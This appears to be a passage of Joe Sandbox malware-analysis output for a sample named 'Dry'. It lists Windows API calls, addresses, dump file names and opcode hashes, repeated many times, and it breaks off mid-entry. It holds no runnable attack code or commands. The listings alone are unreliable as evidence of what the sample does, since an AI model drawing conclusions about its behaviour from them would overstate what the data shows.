                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0fb6c0eaa33af3c8edb90d8e9994f276aaca831138794c839d2f4d13f92c5d76
                                                                                                                                                                                                                                                                                    • Instruction ID: 844ff7ba1cfb315ce8ca15899ca907a65fee02efc7a99740d12215bdd60e58ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fb6c0eaa33af3c8edb90d8e9994f276aaca831138794c839d2f4d13f92c5d76
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B11DB76900218BFD7019BA89C46A9E7FFDFF45360F144255F826F3290DAB4CA048761
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00B0D369,00000000,00000004,00000000), ref: 00B0D588
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B0D594
                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B0D59B
                                                                                                                                                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00B0D5B9
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a4384dee88e493a86b05eadcb0cba39fe0ca7a795dac66a1bbf73c938e5fb321
                                                                                                                                                                                                                                                                                    • Instruction ID: d5789a6c4e8d844b862f1301edaf8331b9586d242e01e3e9e2b252d9234e80ef
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4384dee88e493a86b05eadcb0cba39fe0ca7a795dac66a1bbf73c938e5fb321
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01DE32504214BBCB206FE9EC09BAE7FA8EF81334F100399F929971E0DF718940C6A1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE78B1
                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00AE78C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE78CF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8b9d6c0cd7a9dff0b6bf7e53de13af9a294174c202d06694149d25bb0df8d0d7
                                                                                                                                                                                                                                                                                    • Instruction ID: 47bcfe81a12d6e8112f4b3d530fbd149a6431903da6a4fa55ed1b0dbcfa899e1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9d6c0cd7a9dff0b6bf7e53de13af9a294174c202d06694149d25bb0df8d0d7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4011AD72505188BFEF069F91DC58EEE7B69FF183A4F440116FA0852120DB319CA0EBA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00B1338D,00000364,00000000,00000000,00000000,?,00B135FE,00000006,FlsSetValue), ref: 00B13418
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00B1338D,00000364,00000000,00000000,00000000,?,00B135FE,00000006,FlsSetValue,00B83260,FlsSetValue,00000000,00000364,?,00B131B9), ref: 00B13424
                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B1338D,00000364,00000000,00000000,00000000,?,00B135FE,00000006,FlsSetValue,00B83260,FlsSetValue,00000000), ref: 00B13432
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c50d11feebccec16051ffb941881a0fa0529e815cb1a698d6f247e90325025e6
                                                                                                                                                                                                                                                                                    • Instruction ID: 5cd38d227a1fec0899574f4a450e652d90489f68241158d4b4f6e5edb63c9903
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c50d11feebccec16051ffb941881a0fa0529e815cb1a698d6f247e90325025e6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F401A0326112229BCB324B79DC449D677E8FF05FB17910660F909E7341EB20DD81C6D4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BA8B
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BAB0
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BABA
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BAED
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9f79066df90d77f9b357fe97c49e2bcb020295aa42733f508db7f9ccecf58db3
                                                                                                                                                                                                                                                                                    • Instruction ID: d900f5aa9c6d3b3c23b0dc265590f8d13061587b46aa386d294211cab6663e82
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f79066df90d77f9b357fe97c49e2bcb020295aa42733f508db7f9ccecf58db3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C113931C00A29EBCF009FA5E989AEEBBB8FF09711F504195DA41B3140CF309650EBA5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B7888E
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B788A6
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B788CA
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B788E5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 931371feaa1cb61cee3d0c1331523d304464507444b78052068ed24d2a213688
                                                                                                                                                                                                                                                                                    • Instruction ID: c8a46db2b17bfe6a5733d48bdae06dfb0abb16262a2360173381558918c09fc7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 931371feaa1cb61cee3d0c1331523d304464507444b78052068ed24d2a213688
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D91143B9D00209AFDB41CF98C884AEEBBF5FF08310F508156E919E3210D735AA94CF51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B43712
                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B43723
                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B4372A
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B43731
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 369da8a792fc22026cb0806e5b427d51efe1be2a3bbdc09c9781ae59be8ba6e8
                                                                                                                                                                                                                                                                                    • Instruction ID: 6d83dd97d4d392aa598ab4cb0da94eb02a999b9e9c2d5303e530a5234a591d9c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 369da8a792fc22026cb0806e5b427d51efe1be2a3bbdc09c9781ae59be8ba6e8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0EDB1601224BADA2057A29C8DEEB7FACDF56FE1F540055F50AE2090DEA4CA80D6B1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE1F87
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1F96
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: BeginPath.GDI32(?), ref: 00AE1FAD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1FD6
                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B792E3
                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00B792F0
                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00B79300
                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00B7930E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8267620e1e4a264dbd5ccdcbb51a97c745dfbf5cd2d8f981d6c377600afbbc5c
                                                                                                                                                                                                                                                                                    • Instruction ID: 2dd85d84849f3e785dd6cbddb16dc92cc8f5888abe107dff44759cd62e59fed0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8267620e1e4a264dbd5ccdcbb51a97c745dfbf5cd2d8f981d6c377600afbbc5c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5F0AE31005254BBDB126F54AC0EFCE3F699F09360F048141FA2D220E1CBB55551DFD9
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00AE21BC
                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00AE21C6
                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00AE21D9
                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00AE21E1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a3f02c47dd6461417c8e8f0ad0351c769fadc76acf5a1c081bed8cbe61de4262
                                                                                                                                                                                                                                                                                    • Instruction ID: 358b5532dd159a7592a268a38bfc5e5c0e26fe5c390ffa3f4d88dd3fda442e8a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3f02c47dd6461417c8e8f0ad0351c769fadc76acf5a1c081bed8cbe61de4262
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87E06D31240280AADB215B74BC09BE83BA1EF12776F148219F7BE690E0CB7286809B10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B3EC36
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B3EC40
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B3EC60
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00B3EC81
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3736a6c4ec2fc2b9df1322a59640a1a3628f6c2cc0c62ad4dbb3e929733c0252
                                                                                                                                                                                                                                                                                    • Instruction ID: aa5b2347cf5928e74817a8cd6c77e93285cf76472d2e208836eb9865f4ae9cec
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3736a6c4ec2fc2b9df1322a59640a1a3628f6c2cc0c62ad4dbb3e929733c0252
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE01A70800204DFCF40AFA0C948A6DBBB1EF08351F108449F90EE3290CB389981AF00
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B3EC4A
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B3EC54
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B3EC60
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00B3EC81
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 76ff01e6a894650201ef1679cb1adb87da683641c46d66ba2d43e10826e58d64
                                                                                                                                                                                                                                                                                    • Instruction ID: 05d3785fbf652e62adf7e758bd19a8e19d9969a990581578a958ca3921039c31
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76ff01e6a894650201ef1679cb1adb87da683641c46d66ba2d43e10826e58d64
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24E092B5C00204EFCF51AFA0D948A6DBBB5AF58351B108459F94EE3260CB79AA91AF10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
                                                                                                                                                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B55919
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                    • String ID: *$LPT
                                                                                                                                                                                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                    • Opcode ID: 5754b4476c9f69ea5addede9151161ecd1c123a3c61400339a81ad689419631b
                                                                                                                                                                                                                                                                                    • Instruction ID: 843725f7267da7e4a8c1538e05d25e0705c9d161ae752599812a828a734ac1cb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5754b4476c9f69ea5addede9151161ecd1c123a3c61400339a81ad689419631b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD915B75A00604DFCB24DF54C4A4AA9BBF1EF44315F1980D9E8499B362D735EE89CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00B0E67D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
